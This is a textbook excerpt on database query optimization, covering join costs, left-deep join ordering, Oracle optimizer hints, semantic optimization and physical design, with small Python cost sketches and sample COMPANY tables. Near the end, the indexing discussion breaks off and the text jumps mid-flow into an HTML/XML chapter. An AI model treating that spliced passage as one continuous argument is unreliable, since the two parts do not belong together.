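bD, rD = 13, 125                     # DEPARTMENT: blocks, records
bfrED = 4                            # blocking factor of the result file
js_op6 = 1 / 125                     # join selectivity (Dnumber is a key)
result_tuples = round(js_op6 * rE * rD)          # 10,000 joined tuples
write_result = result_tuples // bfrED            # 2,500 blocks to write the result

xDnumber = 1                         # primary index on Dnumber of DEPARTMENT
xDno, sDno = 2, 80                   # secondary index on Dno of EMPLOYEE

costs = {
    'J1, EMPLOYEE outer':    bE + bE * bD + write_result,
    'J1, DEPARTMENT outer':  bD + bE * bD + write_result,
    'J2c, EMPLOYEE outer':   bE + rE * (xDnumber + 1) + write_result,
    'J2a, DEPARTMENT outer': bD + rD * (xDno + sDno) + write_result,
}
print(costs)   # 30500, 28513, 24500, 12763 -> J2a with DEPARTMENT as outer wins

# With nB = 10 buffers, nested-loop join with DEPARTMENT as outer improves to:
nB = 10
print(bD + ceil(bD / (nB - 2)) * bE + write_result)   # 6513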

8.5 Multiple Relation Queries and JOIN Ordering
The algebraic transformation rules in Section 7.2 include a commutative rule and
an associative rule for the join operation. With these rules, many equivalent join
expressions can be produced. As a result, the number of alternative query trees
grows very rapidly as the number of joins in a query increases. A query that joins n
relations will often have n − 1 join operations, and hence can have a large number of
different join orders. Estimating the cost of every possible join tree for a query with
a large number of joins will require a substantial amount of time by the query opti-
mizer. Hence, some pruning of the possible query trees is needed. Query optimizers
typically limit the structure of a (join) query tree to that of left-deep (or right-deep)
trees. A left-deep tree is a binary tree in which the right child of each nonleaf node
is always a base relation. The optimizer would choose the particular left-deep tree
with the lowest estimated cost. Two examples of left-deep trees are shown in Figure
7. (Note that the trees in Figure 5 are also left-deep trees.)

With left-deep trees, the right child is considered to be the inner relation when exe-
cuting a nested-loop join, or the probing relation when executing a single-loop join.
One advantage of left-deep (or right-deep) trees is that they are amenable to
pipelining, as discussed in Section 6. For instance, consider the first left-deep tree in
Figure 7 and assume that the join algorithm is the single-loop method; in this case,
a disk page of tuples of the outer relation is used to probe the inner relation for
matching tuples. As resulting tuples (records) are produced from the join of R1 and
R2, they can be used to probe R3 to locate their matching records for joining.
Likewise, as resulting tuples are produced from this join, they could be used to
probe R4. Another advantage of left-deep (or right-deep) trees is that having a base
relation as one of the inputs of each join allows the optimizer to utilize any access
paths on that relation that may be useful in executing the join.

If materialization is used instead of pipelining (see Sections 6 and 7.3), the join
results could be materialized and stored as temporary relations. The key idea from
the optimizer’s standpoint with respect to join ordering is to find an ordering that
will reduce the size of the temporary results, since the temporary results (pipelined
or materialized) are used by subsequent operators and hence affect the execution
cost of those operators.
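
A small sketch of how left-deep join orders can be enumerated while avoiding Cartesian
products: generate permutations of the base relations and keep only those in which
each newly added relation has a join condition with some relation already in the
prefix. The join graph for Q2 below is written out by hand as an assumption.

from itertools import permutations

# Join predicates of Q2, as an undirected "join graph".
joins = {frozenset({'PROJECT', 'DEPARTMENT'}),     # Dnum = Dnumber
         frozenset({'DEPARTMENT', 'EMPLOYEE'})}    # Mgr_ssn = Ssn

def connected(prefix, relation):
    return any(frozenset({p, relation}) in joins for p in prefix)

def left_deep_orders(relations):
    orders = []
    for perm in permutations(relations):
        prefix, ok = [perm[0]], True
        for rel in perm[1:]:
            if not connected(prefix, rel):   # would require a CARTESIAN PRODUCT
                ok = False
                break
            prefix.append(rel)
        if ok:
            orders.append(perm)
    return orders

for order in left_deep_orders(['PROJECT', 'DEPARTMENT', 'EMPLOYEE']):
    print(order)
# Prints the four join orders considered in Section 8.6.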

8.6 Example to Illustrate Cost-Based Query Optimization
We will consider query Q2 and its query tree shown in Figure 4(a) to illustrate cost-
based query optimization:

Q2: SELECT Pnumber, Dnum, Lname, Address, Bdate
FROM PROJECT, DEPARTMENT, EMPLOYEE
WHERE Dnum=Dnumber AND Mgr_ssn=Ssn AND

Plocation=‘Stafford’;

Suppose we have the information about the relations shown in Figure 8. The
LOW_VALUE and HIGH_VALUE statistics have been normalized for clarity. The tree
in Figure 4(a) is assumed to represent the result of the algebraic heuristic optimiza-
tion process and the start of cost-based optimization (in this example, we assume
that the heuristic optimizer does not push the projection operations down the tree).

The first cost-based optimization to consider is join ordering. As previously men-
tioned, we assume the optimizer considers only left-deep trees, so the potential join
orders—without CARTESIAN PRODUCT—are:

1. PROJECT ⋈ DEPARTMENT ⋈ EMPLOYEE

2. DEPARTMENT ⋈ PROJECT ⋈ EMPLOYEE

3. DEPARTMENT ⋈ EMPLOYEE ⋈ PROJECT

4. EMPLOYEE ⋈ DEPARTMENT ⋈ PROJECT

Assume that the selection operation has already been applied to the PROJECT rela-
tion. If we assume a materialized approach, then a new temporary relation is
created after each join operation. To examine the cost of join order (1), the first
join is between PROJECT and DEPARTMENT. Both the join method and the access
methods for the input relations must be determined. Since DEPARTMENT has no
index according to Figure 8, the only available access method is a table scan (that is,
a linear search). The PROJECT relation will have the selection operation performed
before the join, so two options exist: table scan (linear search) or utilizing
its PROJ_PLOC index, so the optimizer must compare their estimated costs.

Figure 8
Sample statistical information for relations in Q2. (a) Column information. (b) Table
information. (c) Index information.

(a) Column information:

Table_name    Column_name  Num_distinct  Low_value  High_value
PROJECT       Plocation    200           1          200
PROJECT       Pnumber      2000          1          2000
PROJECT       Dnum         50            1          50
DEPARTMENT    Dnumber      50            1          50
DEPARTMENT    Mgr_ssn      50            1          50
EMPLOYEE      Ssn          10000         1          10000
EMPLOYEE      Dno          50            1          50
EMPLOYEE      Salary       500           1          500

(b) Table information:

Table_name    Num_rows  Blocks
PROJECT       2000      100
DEPARTMENT    50        5
EMPLOYEE      10000     2000

(c) Index information:

Index_name  Uniqueness  Blevel*  Leaf_blocks  Distinct_keys
PROJ_PLOC   NONUNIQUE   1        4            200
EMP_SSN     UNIQUE      1        50           10000
EMP_SAL     NONUNIQUE   1        50           500

*Blevel is the number of levels without the leaf level.

The statistical information on the PROJ_PLOC index (see Figure 8) shows the number
of index levels x = 2 (root plus leaf levels). The index is nonunique (because
Plocation is not a key of PROJECT), so the optimizer assumes a uniform data distri-
bution and estimates the number of record pointers for each Plocation value to be
10. This is computed from the tables in Figure 8 by multiplying Selectivity *
Num_rows, where Selectivity is estimated by 1/Num_distinct. So the cost of using the
index and accessing the records is estimated to be 12 block accesses (2 for the index
and 10 for the data blocks). The cost of a table scan is estimated to be 100 block
accesses, so the index access is more efficient as expected.

In the materialized approach, a temporary file TEMP1 of size 1 block is created to
hold the result of the selection operation. The file size is calculated by determining
the blocking factor using the formula Num_rows/Blocks, which gives 2000/100 or 20
rows per block. Hence, the 10 records selected from the PROJECT relation will fit
into a single block. Now we can compute the estimated cost of the first join. We will
consider only the nested-loop join method, where the outer relation is the tempo-
rary file, TEMP1, and the inner relation is DEPARTMENT. Since the entire TEMP1 file
fits in the available buffer space, we need to read each of the DEPARTMENT table’s
five blocks only once, so the join cost is six block accesses plus the cost of writing the
temporary result file, TEMP2. The optimizer would have to determine the size of
TEMP2. Since the join attribute Dnumber is the key for DEPARTMENT, any Dnum
value from TEMP1 will join with at most one record from DEPARTMENT, so the
number of rows in TEMP2 will be equal to the number of rows in TEMP1, which is
10. The optimizer would determine the record size for TEMP2 and the number of
blocks needed to store these 10 rows. For brevity, assume that the blocking factor for
TEMP2 is five rows per block, so a total of two blocks are needed to store TEMP2.

Finally, the cost of the last join needs to be estimated. We can use a single-loop join
on TEMP2 since in this case the index EMP_SSN (see Figure 8) can be used to probe
and locate matching records from EMPLOYEE. Hence, the join method would
involve reading in each block of TEMP2 and looking up each of the five Mgr_ssn val-
ues using the EMP_SSN index. Each index lookup would require a root access, a leaf
access, and a data block access (x+1, where the number of levels x is 2). So, 10
lookups require 30 block accesses. Adding the two block accesses for TEMP2 gives a
total of 32 block accesses for this join.

For the final projection, assume pipelining is used to produce the final result, which
does not require additional block accesses, so the total cost for join order (1) is esti-
mated as the sum of the previous costs. The optimizer would then estimate costs in
a similar manner for the other three join orders and choose the one with the lowest
estimate. We leave this as an exercise for the reader.
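
For reference, the sketch below simply totals the block-access estimates derived above for join order (1); the individual numbers are the ones quoted in the text.

# Total estimated cost of join order (1), in block accesses.
cost_select_project = 12       # PROJ_PLOC index (2 levels) + 10 data blocks
cost_join1          = 6 + 2    # nested loop: TEMP1 (1) + DEPARTMENT (5), plus writing TEMP2 (2)
cost_join2          = 32       # 2 blocks of TEMP2 + 10 EMP_SSN lookups * (x + 1) = 30
cost_projection     = 0        # the final PROJECT is pipelined

total = cost_select_project + cost_join1 + cost_join2 + cost_projection
print(total)   # 52 (charging the write of TEMP1 itself would add one more block access)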

9 Overview of Query Optimization
in Oracle

The Oracle DBMS22 provides two different approaches to query optimization: rule-
based and cost-based. With the rule-based approach, the optimizer chooses execu-
tion plans based on heuristically ranked operations. Oracle maintains a table of 15
ranked access paths, where a lower ranking implies a more efficient approach. The
access paths range from table access by ROWID (the most efficient)—where ROWID
specifies the record’s physical address that includes the data file, data block, and row
offset within the block—to a full table scan (the least efficient)—where all rows in
the table are searched by doing multiblock reads. However, the rule-based approach
is being phased out in favor of the cost-based approach, where the optimizer exam-
ines alternative access paths and operator algorithms and chooses the execution
plan with the lowest estimated cost. The estimated query cost is proportional to the
expected elapsed time needed to execute the query with the given execution plan.

22The discussion in this section is primarily based on version 7 of Oracle. More optimization techniques
have been added to subsequent versions.


The Oracle optimizer calculates this cost based on the estimated usage of resources,
such as I/O, CPU time, and memory needed. The goal of cost-based optimization in
Oracle is to minimize the elapsed time to process the entire query.

An interesting addition to the Oracle query optimizer is the capability for an appli-
cation developer to specify hints to the optimizer.23 The idea is that an application
developer might know more information about the data than the optimizer. For
example, consider the EMPLOYEE table shown in Figure A.2. The Sex column of that
table has only two distinct values. If there are 10,000 employees, then the optimizer
would estimate that half are male and half are female, assuming a uniform data dis-
tribution. If a secondary index exists, it would more than likely not be used.
However, if the application developer knows that there are only 100 male employ-
ees, a hint could be specified in an SQL query whose WHERE-clause condition is Sex
= ‘M’ so that the associated index would be used in processing the query. Various
hints can be specified, such as:

■ The optimization approach for an SQL statement

■ The access path for a table accessed by the statement

■ The join order for a join statement

■ A particular join operation in a join statement

The cost-based optimization of Oracle 8 and later versions is a good example of the
sophisticated approach taken to optimize SQL queries in commercial RDBMSs.
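
As a concrete illustration, a hinted statement issued from application code might look as follows. This is only a sketch: the index name EMP_SEX_IDX is hypothetical, conn is assumed to be an open database connection, and hint syntax and behavior vary across Oracle versions.

# The /*+ INDEX(...) */ comment is an Oracle-style optimizer hint asking that
# the (assumed) index EMP_SEX_IDX be used despite its apparently poor selectivity.
query = """
    SELECT /*+ INDEX(EMPLOYEE EMP_SEX_IDX) */ Fname, Lname
    FROM   EMPLOYEE
    WHERE  Sex = 'M'
"""

def fetch_male_employees(conn):
    cur = conn.cursor()       # conn: an open DB-API connection (assumption)
    cur.execute(query)
    return cur.fetchall()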

10 Semantic Query Optimization
A different approach to query optimization, called semantic query optimization,
has been suggested. This technique, which may be used in combination with the
techniques discussed previously, uses constraints specified on the database
schema—such as unique attributes and other more complex constraints—in order
to modify one query into another query that is more efficient to execute. We will not
discuss this approach in detail but we will illustrate it with a simple example.
Consider the SQL query:

SELECT E.Lname, M.Lname
FROM EMPLOYEE AS E, EMPLOYEE AS M
WHERE E.Super_ssn=M.Ssn AND E.Salary > M.Salary

This query retrieves the names of employees who earn more than their supervisors.
Suppose that we had a constraint on the database schema that stated that no
employee can earn more than his or her direct supervisor. If the semantic query
optimizer checks for the existence of this constraint, it does not need to execute the
query at all because it knows that the result of the query will be empty. This may
save considerable time if the constraint checking can be done efficiently. However,
searching through many constraints to find those that are applicable to a given

23Such hints have also been called query annotations.


query and that may semantically optimize it can also be quite time-consuming.
With the inclusion of active rules and additional metadata in database systems,
semantic query optimization techniques are being gradually incorporated into the
DBMSs.
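
The sketch below illustrates the idea of such a check; the way the constraint and the query predicate are encoded here is invented purely for the example.

# If a schema constraint logically contradicts the query's WHERE condition,
# the optimizer can return an empty result without reading any data.
QUERY_PREDICATE   = ("E.Salary", ">",  "M.Salary")   # from the WHERE clause above
SCHEMA_CONSTRAINT = ("E.Salary", "<=", "M.Salary")   # no employee earns more than the supervisor

CONTRADICTORY = {(">", "<="), ("<", ">="), ("=", "<>")}

def provably_empty(pred, constraint):
    same_operands = (pred[0], pred[2]) == (constraint[0], constraint[2])
    return same_operands and (pred[1], constraint[1]) in CONTRADICTORY

if provably_empty(QUERY_PREDICATE, SCHEMA_CONSTRAINT):
    print("Result is empty; the query need not be executed.")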

11 Summary
In this chapter we gave an overview of the techniques used by DBMSs in processing
and optimizing high-level queries. We first discussed how SQL queries are trans-
lated into relational algebra and then how various relational algebra operations may
be executed by a DBMS. We saw that some operations, particularly SELECT and
JOIN, may have many execution options. We also discussed how operations can be
combined during query processing to create pipelined or stream-based execution
instead of materialized execution.

Following that, we described heuristic approaches to query optimization, which use
heuristic rules and algebraic techniques to improve the efficiency of query execu-
tion. We showed how a query tree that represents a relational algebra expression can
be heuristically optimized by reorganizing the tree nodes and transforming it
into another equivalent query tree that is more efficient to execute. We also gave
equivalence-preserving transformation rules that may be applied to a query tree.
Then we introduced query execution plans for SQL queries, which add method exe-
cution plans to the query tree operations.

We discussed the cost-based approach to query optimization. We showed how cost
functions are developed for some database access algorithms and how these cost
functions are used to estimate the costs of different execution strategies. We pre-
sented an overview of the Oracle query optimizer, and we mentioned the technique
of semantic query optimization.

Review Questions
1. Discuss the reasons for converting SQL queries into relational algebra
queries before optimization is done.

2. Discuss the different algorithms for implementing each of the following
relational operators and the circumstances under which each algorithm can
be used: SELECT, JOIN, PROJECT, UNION, INTERSECT, SET DIFFERENCE,
CARTESIAN PRODUCT.

3. What is a query execution plan?

4. What is meant by the term heuristic optimization? Discuss the main heuris-
tics that are applied during query optimization.

5. How does a query tree represent a relational algebra expression? What is
meant by an execution of a query tree? Discuss the rules for transformation
of query trees and identify when each rule should be applied during opti-
mization.


6. How many different join orders are there for a query that joins 10 relations?

7. What is meant by cost-based query optimization?

8. What is the difference between pipelining and materialization?

9. Discuss the cost components for a cost function that is used to estimate
query execution cost. Which cost components are used most often as the
basis for cost functions?

10. Discuss the different types of parameters that are used in cost functions.
Where is this information kept?

11. List the cost functions for the SELECT and JOIN methods discussed in
Section 8.

12. What is meant by semantic query optimization? How does it differ from
other query optimization techniques?

Exercises
13. Consider SQL queries Q1, Q8, Q1B, and Q4 in the chapter Basic SQL and
Q27 in the chapter More SQL: Complex Queries, Triggers, Views, and
Schema Modification.

a. Draw at least two query trees that can represent each of these queries.
Under what circumstances would you use each of your query trees?

b. Draw the initial query tree for each of these queries, and then show how
the query tree is optimized by the algorithm outlined in Section 7.

c. For each query, compare your own query trees of part (a) and the initial
and final query trees of part (b).

14. A file of 4096 blocks is to be sorted with an available buffer space of 64
blocks. How many passes will be needed in the merge phase of the external
sort-merge algorithm?

15. Develop cost functions for the PROJECT, UNION, INTERSECTION, SET DIF-
FERENCE, and CARTESIAN PRODUCT algorithms discussed in Section 4.

16. Develop cost functions for an algorithm that consists of two SELECTs, a
JOIN, and a final PROJECT, in terms of the cost functions for the individual
operations.

17. Can a nondense index be used in the implementation of an aggregate opera-
tor? Why or why not?

18. Calculate the cost functions for different options of executing the JOIN oper-
ation OP7 discussed in Section 3.2.

19. Develop formulas for the hybrid hash-join algorithm for calculating the size
of the buffer for the first bucket. Develop more accurate cost estimation for-
mulas for the algorithm.


20. Estimate the cost of operations OP6 and OP7, using the formulas developed
in Exercise 9.

21. Extend the sort-merge join algorithm to implement the LEFT OUTER JOIN
operation.

22. Compare the cost of two different query plans for the following query:

σSalary>40000(EMPLOYEE ⋈Dno=Dnumber DEPARTMENT)

Use the database statistics in Figure 8.

Selected Bibliography
A detailed algorithm for relational algebra optimization is given by Smith and
Chang (1975). The Ph.D. thesis of Kooi (1980) provides a foundation for query pro-
cessing techniques. A survey paper by Jarke and Koch (1984) gives a taxonomy of
query optimization and includes a bibliography of work in this area. A survey by
Graefe (1993) discusses query execution in database systems and includes an exten-
sive bibliography.

Whang (1985) discusses query optimization in OBE (Office-By-Example), which is
a system based on the language QBE. Cost-based optimization was introduced in
the SYSTEM R experimental DBMS and is discussed in Astrahan et al. (1976).
Selinger et al. (1979) is a classic paper that discussed cost-based optimization of
multiway joins in SYSTEM R. Join algorithms are discussed in Gotlieb (1975),
Blasgen and Eswaran (1976), and Whang et al. (1982). Hashing algorithms for
implementing joins are described and analyzed in DeWitt et al. (1984),
Bratbergsengen (1984), Shapiro (1986), Kitsuregawa et al. (1989), and Blakeley and
Martin (1990), among others. Approaches to finding a good join order are pre-
sented in Ioannidis and Kang (1990) and in Swami and Gupta (1989). A discussion
of the implications of left-deep and bushy join trees is presented in Ioannidis and
Kang (1991). Kim (1982) discusses transformations of nested SQL queries into
canonical representations. Optimization of aggregate functions is discussed in Klug
(1982) and Muralikrishna (1992). Salzberg et al. (1990) describe a fast external sort-
ing algorithm. Estimating the size of temporary relations is crucial for query opti-
mization. Sampling-based estimation schemes are presented in Haas et al. (1995)
and in Haas and Swami (1995). Lipton et al. (1990) also discuss selectivity estima-
tion. Having the database system store and use more detailed statistics in the form
of histograms is the topic of Muralikrishna and DeWitt (1988) and Poosala et al.
(1996).

Kim et al. (1985) discuss advanced topics in query optimization. Semantic query
optimization is discussed in King (1981) and Malley and Zdonick (1986). Work on
semantic query optimization is reported in Chakravarthy et al. (1990), Shenoy and
Ozsoyoglu (1989), and Siegel et al. (1992).


Figure A.1
Schema diagram for the COMPANY relational database schema.

EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)
DEPARTMENT (Dname, Dnumber, Mgr_ssn, Mgr_start_date)
DEPT_LOCATIONS (Dnumber, Dlocation)
PROJECT (Pname, Pnumber, Plocation, Dnum)
WORKS_ON (Essn, Pno, Hours)
DEPENDENT (Essn, Dependent_name, Sex, Bdate, Relationship)


Figure A.2
One possible database state for the COMPANY relational database schema.

EMPLOYEE
Fname     Minit  Lname    Ssn        Bdate       Address                   Sex  Salary  Super_ssn  Dno
John      B      Smith    123456789  1965-01-09  731 Fondren, Houston, TX  M    30000   333445555  5
Franklin  T      Wong     333445555  1955-12-08  638 Voss, Houston, TX     M    40000   888665555  5
Alicia    J      Zelaya   999887777  1968-01-19  3321 Castle, Spring, TX   F    25000   987654321  4
Jennifer  S      Wallace  987654321  1941-06-20  291 Berry, Bellaire, TX   F    43000   888665555  4
Ramesh    K      Narayan  666884444  1962-09-15  975 Fire Oak, Humble, TX  M    38000   333445555  5
Joyce     A      English  453453453  1972-07-31  5631 Rice, Houston, TX    F    25000   333445555  5
Ahmad     V      Jabbar   987987987  1969-03-29  980 Dallas, Houston, TX   M    25000   987654321  4
James     E      Borg     888665555  1937-11-10  450 Stone, Houston, TX    M    55000   NULL       1

DEPARTMENT
Dname           Dnumber  Mgr_ssn    Mgr_start_date
Research        5        333445555  1988-05-22
Administration  4        987654321  1995-01-01
Headquarters    1        888665555  1981-06-19

DEPT_LOCATIONS
Dnumber  Dlocation
1        Houston
4        Stafford
5        Bellaire
5        Sugarland
5        Houston

WORKS_ON
Essn       Pno  Hours
123456789  1    32.5
123456789  2    7.5
666884444  3    40.0
453453453  1    20.0
453453453  2    20.0
333445555  2    10.0
333445555  3    10.0
333445555  10   10.0
333445555  20   10.0
999887777  30   30.0
999887777  10   10.0
987987987  10   35.0
987987987  30   5.0
987654321  30   20.0
987654321  20   15.0
888665555  20   NULL

PROJECT
Pname            Pnumber  Plocation  Dnum
ProductX         1        Bellaire   5
ProductY         2        Sugarland  5
ProductZ         3        Houston    5
Computerization  10       Stafford   4
Reorganization   20       Houston    1
Newbenefits      30       Stafford   4

DEPENDENT
Essn       Dependent_name  Sex  Bdate       Relationship
333445555  Alice           F    1986-04-05  Daughter
333445555  Theodore        M    1983-10-25  Son
333445555  Joy             F    1958-05-03  Spouse
987654321  Abner           M    1942-02-28  Spouse
123456789  Michael         M    1988-01-04  Son
123456789  Alice           F    1988-12-30  Daughter
123456789  Elizabeth       F    1967-05-05  Spouse


Physical Database
Design and Tuning

Various techniques by which queries can be processed efficiently by the DBMS are mostly
internal to the DBMS and invisible to the programmer. In this chapter we discuss
additional issues that affect the performance of an application running on a DBMS.
In particular, we discuss some of the options available to database administrators
and programmers for storing databases, and some of the heuristics, rules, and tech-
niques that they can use to tune the database for performance improvement. First,
in Section 1, we discuss the issues that arise in physical database design dealing with
storage and access of data. Then, in Section 2, we discuss how to improve database
performance through tuning, indexing of data, database design, and the queries
themselves.

1 Physical Database Design
in Relational Databases

In this section, we begin by discussing the physical design factors that affect the per-
formance of applications and transactions, and then we comment on the specific
guidelines for RDBMSs.

1.1 Factors That Influence Physical Database Design
Physical design is an activity where the goal is not only to create the appropriate
structuring of data in storage, but also to do so in a way that guarantees good per-
formance. For a given conceptual schema, there are many physical design alterna-
tives in a given DBMS. It is not possible to make meaningful physical design

From Chapter 20 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


decisions and performance analyses until the database designer knows the mix of
queries, transactions, and applications that are expected to run on the database.
This is called the job mix for the particular set of database system applications. The
database administrators/designers must analyze these applications, their expected
frequencies of invocation, any timing constraints on their execution speed, the
expected frequency of update operations, and any unique constraints on attributes.
We discuss each of these factors next.

A. Analyzing the Database Queries and Transactions. Before undertaking
the physical database design, we must have a good idea of the intended use of the
database by defining in a high-level form the queries and transactions that are
expected to run on the database. For each retrieval query, the following informa-
tion about the query would be needed:

1. The files that will be accessed by the query.1

2. The attributes on which any selection conditions for the query are specified.

3. Whether the selection condition is an equality, inequality, or a range condi-
tion.

4. The attributes on which any join conditions or conditions to link multiple
tables or objects for the query are specified.

5. The attributes whose values will be retrieved by the query.

The attributes listed in items 2 and 4 above are candidates for the definition of
access structures, such as indexes, hash keys, or sorting of the file.

For each update operation or update transaction, the following information
would be needed:

1. The files that will be updated.

2. The type of operation on each file (insert, update, or delete).

3. The attributes on which selection conditions for a delete or update are spec-
ified.

4. The attributes whose values will be changed by an update operation.

Again, the attributes listed in item 3 are candidates for access structures on the files,
because they would be used to locate the records that will be updated or deleted. On
the other hand, the attributes listed in item 4 are candidates for avoiding an access
structure, since modifying them will require updating the access structures.

B. Analyzing the Expected Frequency of Invocation of Queries and
Transactions. Besides identifying the characteristics of expected retrieval queries
and update transactions, we must consider their expected rates of invocation. This
frequency information, along with the attribute information collected on each
query and transaction, is used to compile a cumulative list of the expected fre-
quency of use for all queries and transactions. This is expressed as the expected fre-
quency of using each attribute in each file as a selection attribute or a join attribute,

1For simplicity we use the term files here, but this can also mean tables or relations.


over all the queries and transactions. Generally, for large volumes of processing, the
informal 80–20 rule can be used: approximately 80 percent of the processing is
accounted for by only 20 percent of the queries and transactions. Therefore, in prac-
tical situations, it is rarely necessary to collect exhaustive statistics and invocation
rates on all the queries and transactions; it is sufficient to determine the 20 percent
or so most important ones.

C. Analyzing the Time Constraints of Queries and Transactions. Some
queries and transactions may have stringent performance constraints. For example,
a transaction may have the constraint that it should terminate within 5 seconds on
95 percent of the occasions when it is invoked, and that it should never take more
than 20 seconds. Such timing constraints place further priorities on the attributes
that are candidates for access paths. The selection attributes used by queries and
transactions with time constraints become higher-priority candidates for primary
access structures for the files, because the primary access structures are generally the
most efficient for locating records in a file.

D. Analyzing the Expected Frequencies of Update Operations. A minimum
number of access paths should be specified for a file that is frequently updated,
because updating the access paths themselves slows down the update operations. For
example, if a file that has frequent record insertions has 10 indexes on 10 different
attributes, each of these indexes must be updated whenever a new record is inserted.
The overhead for updating 10 indexes can slow down the insert operations.

E. Analyzing the Uniqueness Constraints on Attributes. Access paths should
be specified on all candidate key attributes—or sets of attributes—that are either the
primary key of a file or unique attributes. The existence of an index (or other access
path) makes it sufficient to only search the index when checking this uniqueness
constraint, since all values of the attribute will exist in the leaf nodes of the index.
For example, when inserting a new record, if a key attribute value of the new record
already exists in the index, the insertion of the new record should be rejected, since it
would violate the uniqueness constraint on the attribute.
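
As a small illustration (a sketch using SQLite; the table, index name, and data values are made up for the example), the unique index is what lets the second insertion below be rejected without scanning the whole table:

# Uniqueness checking through an index: the duplicate key is detected in the
# index and the insertion is rejected.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE EMPLOYEE (Ssn TEXT, Lname TEXT)")
conn.execute("CREATE UNIQUE INDEX Emp_ssn_idx ON EMPLOYEE (Ssn)")

conn.execute("INSERT INTO EMPLOYEE VALUES ('123456789', 'Smith')")
try:
    conn.execute("INSERT INTO EMPLOYEE VALUES ('123456789', 'Jones')")
except sqlite3.IntegrityError as err:
    print("Insertion rejected:", err)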

Once the preceding information is compiled, it is possible to address the physical
database design decisions, which consist mainly of deciding on the storage struc-
tures and access paths for the database files.

1.2 Physical Database Design Decisions
Most relational systems represent each base relation as a physical database file. The
access path options include specifying the type of primary file organization for each
relation and the attributes on which indexes should be defined. At most, one of
the indexes on each file may be a primary or a clustering index. Any number of
additional secondary indexes can be created.2

2The reader should review the various types of indexes and be familiar with the algorithms for query
processing.


Design Decisions about Indexing. The attributes whose values are required in
equality or range conditions (selection operation) and those that are keys or
that participate in join conditions (join operation) require access paths, such
as indexes.

The performance of queries largely depends upon what indexes or hashing schemes
exist to expedite the processing of selections and joins. On the other hand, during
insert, delete, or update operations, the existence of indexes adds to the overhead.
This overhead must be justified in terms of the gain in efficiency by expediting
queries and transactions.

The physical design decisions for indexing fall into the following categories:

1. Whether to index an attribute. The general rules for creating an index on an
attribute are that the attribute must either be a key (unique), or there must
be some query that uses that attribute either in a selection condition (equal-
ity or range of values) or in a join condition. One reason for creating multi-
ple indexes is that some operations can be processed by just scanning the
indexes, without having to access the actual data file.

2. What attribute or attributes to index on. An index can be constructed on a
single attribute, or on more than one attribute if it is a composite index. If
multiple attributes from one relation are involved together in several queries
(for example, (Garment_style_#, Color) in a garment inventory database), a
multiattribute (composite) index is warranted. The ordering of attributes
within a multiattribute index must correspond to the queries. For instance,
the above index assumes that queries would be based on an ordering of col-
ors within a Garment_style_# rather than vice versa.

3. Whether to set up a clustered index. At most, one index per table can be a
primary or clustering index, because this implies that the file be physically
ordered on that attribute. In most RDBMSs, this is specified by the keyword
CLUSTER. (If the attribute is a key, a primary index is created, whereas a
clustering index is created if the attribute is not a key.) If a table requires sev-
eral indexes, the decision about which one should be the primary or cluster-
ing index depends upon whether keeping the table ordered on that attribute
is needed. Range queries benefit a great deal from clustering. If several
attributes require range queries, relative benefits must be evaluated before
deciding which attribute to cluster on. If a query is to be answered by doing
an index search only (without retrieving data records), the corresponding
index should not be clustered, since the main benefit of clustering is achieved
when retrieving the records themselves. A clustering index may be set up as a
multiattribute index if range retrieval by that composite key is useful in
report creation (for example, an index on Zip_code, Store_id, and Product_id
may be a clustering index for sales data).

4. Whether to use a hash index over a tree index. In general, RDBMSs use B+-
trees for indexing. However, ISAM and hash indexes are also provided in
some systems. B+-trees support both equality and range queries on the
attribute used as the search key. Hash indexes work well with equality


conditions, particularly during joins to find matching record(s), but they
do not support range queries.

5. Whether to use dynamic hashing for the file. For files that are very
volatile—that is, those that grow and shrink continuously—one of the
dynamic hashing schemes would be suitable. Currently, they are not offered
by many commercial RDBMSs.

How to Create an Index. Many RDBMSs have a similar type of command for
creating an index, although it is not part of the SQL standard. The general form of
this command is:

CREATE [ UNIQUE ] INDEX <index name>
ON <table name> ( <column name> [ <order> ] { , <column name> [ <order> ] } )
[ CLUSTER ] ;
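
For instance, the sketch below issues such a command through SQLite, whose CREATE INDEX statement follows this general form (the table, column, and index names adapt the garment example discussed earlier; the CLUSTER option is not supported by SQLite):

# A composite index whose attribute order matches queries that fix a garment
# style and then select or range over colors within that style.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE GARMENT (Garment_style_no INTEGER, Color TEXT, Qty INTEGER)")
conn.execute("CREATE INDEX Style_color_idx ON GARMENT (Garment_style_no ASC, Color ASC)")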

The <TABLE> and <TD> start tags have one and two
attributes, respectively.

HTML has a very large number of predefined tags, and whole books are devoted to
describing how to use these tags. If designed properly, HTML documents can be

1That is why it is known as HyperText Markup Language.
2<TD> stands for table data.
3This is how the term attribute is used in document markup languages, which differs from how it is used
in database models.


formatted so that humans are able to easily understand the document contents, and
are able to navigate through the resulting Web documents. However, the source
HTML text documents are very difficult to interpret automatically by computer pro-
grams because they do not include schema information about the type of data in the
documents. As e-commerce and other Internet applications become increasingly
automated, it is becoming crucial to be able to exchange Web documents among
various computer sites and to interpret their contents automatically. This need was
one of the reasons that led to the development of XML. In addition, an extendible
version of HTML called XHTML was developed that allows users to extend the tags
of HTML for different applications, and allows an XHTML file to be interpreted by
standard XML processing programs. Our discussion will focus on XML only.

The example in Figure 2 illustrates a static HTML page, since all the information to
be displayed is explicitly spelled out as fixed text in the HTML file. In many cases,
some of the information to be displayed may be extracted from a database. For
example, the project names and the employees working on each project may be
extracted from the database in Figure A.1 through the appropriate SQL query. We
may want to use the same HTML formatting tags for displaying each project and the
employees who work on it, but we may want to change the particular projects (and
employees) being displayed. For example, we may want to see a Web page displaying
the information for ProjectX, and then later a page displaying the information for
ProjectY. Although both pages are displayed using the same HTML formatting tags,
the actual data items displayed will be different. Such Web pages are called dynamic,
since the data parts of the page may be different each time it is displayed, even
though the display appearance is the same.

2 XML Hierarchical (Tree) Data Model
We now introduce the data model used in XML. The basic object in XML is the
XML document. Two main structuring concepts are used to construct an XML doc-
ument: elements and attributes. It is important to note that the term attribute in
XML is not used in the same manner as is customary in database terminology, but
rather as it is used in document description languages such as HTML and SGML.4

Attributes in XML provide additional information that describes elements, as we
will see. There are additional concepts in XML, such as entities, identifiers, and ref-
erences, but first we concentrate on describing elements and attributes to show the
essence of the XML model.

Figure 3 shows an example of an XML element called <Projects>. As in HTML, ele-
